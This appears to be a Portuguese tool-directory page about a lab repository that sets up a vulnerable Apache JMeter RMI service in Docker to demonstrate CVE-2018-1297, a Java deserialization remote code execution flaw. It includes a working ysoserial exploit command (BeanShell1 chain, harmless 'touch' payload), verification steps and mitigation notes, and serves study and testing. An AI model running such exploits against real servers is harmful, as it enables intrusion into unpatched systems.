Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/48484848484848/jmeter-cve-2018-1297-
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHub48484848484848/jmeter-cve-2018-1297-

Jmeter-CVE-2018-1297-

# Ambiente Dockerizado Apache JMeter RMI Vulnerável para RCE por Desserialização CVE-2018-1297, com Comandos de Exploração ysoserial, Verificação e Orientação de Mitigação.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
2há 2 anosAinda não revisado
Compartilhar

Vulnerabilidade de execução de comando de desserialização Jmeter RMI (CVE-2018-1297)



Apache JMeter é um conjunto de software open source escrito em Java pela American Apache Software Foundation para testes de estresse e desempenho.
As versões 2.x e 3.x têm uma vulnerabilidade de desserialização, e um atacante pode usar essa vulnerabilidade para executar comandos arbitrários no servidor alvo.

Execução do ambiente de vulnerabilidade :


root@kitploit:~
docker compose up -d

Eu usei o docker no Kali Linux.

Quando a execução é concluída, o serviço RMI é iniciado e escuta na porta 1099.


Vulnerabilidade :


Realize o ataque de vulnerabilidade usando diretamente o ysoserial.
root@kitploit:~
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success’
Esta vulnerabilidade explora a vulnerabilidade RMI (Remote Method Invocation) que pode ocorrer em aplicações baseadas em Java. O 'ysoserial-0.0.6-SNAPSHOT-all.jar' usado aqui faz parte do projeto ysoserial, e é usado para gerar payloads que exploram vulnerabilidades de desserialização Java para permitir execução remota de código. Este payload tem o objetivo de executar comandos como /tmp/success, e através desta vulnerabilidade, um atacante pode executar comandos arbitrários no sistema remoto ou modificar arquivos do sistema. Medidas para mitigar esta vulnerabilidade incluem restrição de acesso ao serviço RMI, controle rigoroso de permissões e filtragem de desserialização Java.

Insira o comando como acima.
Usei a cadeia de exploit BeanShell1.

root@kitploit:~
docker compose exec jmeter bash

Usando isso para entrar no contêiner, você pode ver que '/tmp/success' foi criado com sucesso.


Resumo







Baixar ferramenta